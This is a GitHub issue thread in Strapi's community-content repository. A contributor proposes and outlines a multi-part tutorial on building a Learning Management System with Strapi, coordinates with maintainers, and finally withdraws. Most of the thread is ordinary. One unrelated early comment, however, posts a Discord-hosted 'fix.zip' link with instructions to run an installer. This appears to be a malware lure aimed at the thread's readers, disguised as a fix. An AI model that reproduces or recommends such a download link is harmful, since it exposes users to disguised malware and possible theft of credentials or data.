### ISSUE TITLE
Building a Learning Management System with Strapi CMS

### ISSUE THREAD

**Issue by 0xRTekk** [strapi/community-content#1551]
#### The context
This tutorial article guides developers in building a **Learning Management System** for an online school using Strapi CMS.

In this tutorial, developers will build an application to manage all the training materials like degrees, courses, lessons, quizzes, and exams but also the different classes with their students.
They will be guided in the creation of custom modules and views that meet the specific needs of correcting tests, monitoring learners and also statistics.
To complete this article, we will create different views of the students platform : the e-learning application and the view to take the assessments.

#### Tech stack 
- Strapi
- SQLite
- Strapi Cloud
- NextJS
- TailwindCSS/EverUI

#### In summary 
The article will cover LMS key features :
- Course creation and management
- User enrollment and tracking
- Content delivery (text, images, videos, quizzes, etc.)
- Assessment and evaluation tools (quizzes, exams)
- Reporting and analytics
- Centralized platform for learners to access training materials

### What are the objectives of your article?

The developers and readers will learn :
- Install & setup a Strapi project
- Collections types
- Content management
- Custom fields
- Relations
- Assets/medias management
- Deployement to Strapi Cloud
- Database transfert to Strapi Cloud instance
- Release Workflow
- Review Workflow
- RBAC with multiple Admin users, roles and permissions (Admin, Teaching writers, Assessment Correctors, Reviewers)
- API keys managements for different frontend applications
  - platform for students to access training materials
  - platform for students to pass the exams
 - Creation of custom plugins
   - Assessments correction
   - Students evaluations
   - Analytics

### What is your expertise as a developer or writer?

Intermediate

### What type of post is this?

Tutorial

### Terms & Conditions

- [X] I have read the Write for the Community program guidelines.

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by 0xRTekk** [comment]
Hi @Theodore-Kelechukwu-Onyejiaku !
Here's my suggested tutorial article for building an LMS for an online school👍

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Hi @0xRTekk,

Thanks for your time and outline. At the moment, we have plans to write this in-house. Meanwhile, please do well to propose another one. Thank you.

I can't wait to see your contributions.

**Comment by 0xRTekk** [comment]
Damned, so cool !
As it was the project idea I presented for my technical assessment for the Product Advocate position, feel free to DM me if you want any feedbacks or idea 👍

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
I have now assigned this to you. You can proceed.

Meanwhile, we could make this a blog series, perhaps 1-3. What do you think? 

An example of a completed tutorial blog series is this: 
https://strapi.io/blog/build-a-transcription-app-with-strapi-chatgpt-and-whisper-part-3

Please let me know what you think. Thank you. I can't wait to see more of your contributions. 💪

**Comment by 0xRTekk** [comment]
Yes this is a good idea ! 
So we can dive into all the differents points 👍

What do you think about :

## 1. First steps to build an LMS application with Strapi CMS

**1. Installation and setup**
    - Explaining the context
    - Install Strapi locally
    - Setup the local instance
**2. Teaching materials management**
    - Explaining de database structure (Database modeling)
    - Creating the collection types Degree, Course, Lesson, Quizz, Exams
    - Relation fields explanation
    - Install a plugins to add a RichText Editor as a custom field
    - Create the contents (showcase the media manager)
**3. Users and Students management**
    - Explaining the difference between **admin users** and **end users**
    - Update the User collection to fit to the LMS needs (renaming, add and remove some fields)
    - Create a Class collection types and the relation with Student

## 2. Instantly deploy your LMS with Strapi Cloud

**1. Easy deployment with Strapi Cloud**
    - Create a Strapi Cloud account and deploy the local instance
    - Navigating the Cloud Admin Panel
    - Transfert the local data to the Cloud instance
**2. Boost your teams efficiency**
    - Explaining RBAC and create admin users with different roles and permissions
    - Explanation & creation of release workflows answering the school's needs
    - Explanation and creation of workflows based on the school's structure
**3. Tweaking your LMS**
    - Changing the admin URL to fit the school's name
    - API keys managements for different frontend applications
        - pedagogical materials platform for students
        - assessments platform for students

## 3. High added-value developments for your LMS

**1. Build a custom plugin for the students assessments corrections**
**2. Build a custom plugin for the students individual evaluations and feedbacks**
**3. Build a custom plugin for some stats** 
**4. Build a basic frontend for** 
    - pedagogical materials platform for students
    - assessments platform for students

**Comment by 0xRTekk** [comment]
I wonder if the third part isn't a bit too heavy... 
Do you think I should remove some elements 🤔  @Theodore-Kelechukwu-Onyejiaku ?

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Hi @0xRTekk ,

Just checking back. Please would you be willing to use v5? 🙂

**Comment by 0xRTekk** [comment]
Yes with pleasure ! 
It'll be a great opportunity to test the version and move it forward 👍

**Comment by vcoisne** [comment]
@0xRTekk did you get a chance to start working on this ? We have a lot of interest in the LMS use case :)

**Comment by 0xRTekk** [comment]
@vcoisne I've started to work a bit on the LMS application using V5 RC. But before we go any further, we need to plan some time with @Theodore-Kelechukwu-Onyejiaku and @PaulBratslavsky  to discuss ideas for the application and validate the plan of the article series.

Now that V5 is out, the team should have more time and I'll be able to switch over to the release and get on with things 👍

**Comment by 0xRTekk** [comment]
@PaulBratslavsky here you can check my availabilities. Looking forward to discuss about the application 😀

https://calendly.com/d/cpt5-qc4-nxx/30min

**Comment by 0xRTekk** [comment]
We've had a chat with Paul and we think it would be a good idea to create a fourth part to this series for integration into a Next.js application with deployment on Vercel.

That way, I can concentrate on creating plugins in part three. 

The content will then be well separated.
What do you thin k @Theodore-Kelechukwu-Onyejiaku ?

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Please proceed @0xRTekk 

Thank you!

**Comment by vcoisne** [comment]
Hey @0xRTekk hope you are doing well. How is the article coming along ?

**Comment by 0xRTekk** [comment]
I'm doing great thank you @vcoisne 👍
I'm just coming back from a long holiday. I'll be able to get back into it quickly (once I'm no longer jetlagged 😆)

**Comment by vcoisne** [comment]
That's great to hear @0xRTekk excited to see the end result :)

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Hi @0xRTekk , happy new year! Please, may i know the update on this?

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Hi @0xRTekk , I trust you are having a great week.

I am just pinging you to know the status of this content request. Can you deliver it anytime this month?

Thank you for your contribution to the "Write for the Community" issue.

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Glad to have you back @0xRTekk , I trust you are doing great.

May I know the status of the draft now?

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Hi @0xRTekk , trust you are doing fine.

Please, may I know the status of this work?

**Comment by Theodore-Kelechukwu-Onyejiaku** [comment]
Hi @0xRTekk, trust you are doing ok.

I will have to close this issue due to no response from you 

If you have any questions or concerns, please let me know. Thank you for your interest in contributing to the "Write for the Community" program.

**Comment by 0xRTekk** [comment]
Hi @Theodore-Kelechukwu-Onyejiaku 

I sincerely apologize for the wait! To be honest, I've run out of time to work on this project, as the others are already taking up all my time.
I have no more activity on my personal github profile, everything is happening on GitLab for me at the moment haha

I hope someone can pick up on this topic as I'm sure it will make a great series of useful articles for developers!

Sorry again,
I wish the whole Strapi team all the best for the future!
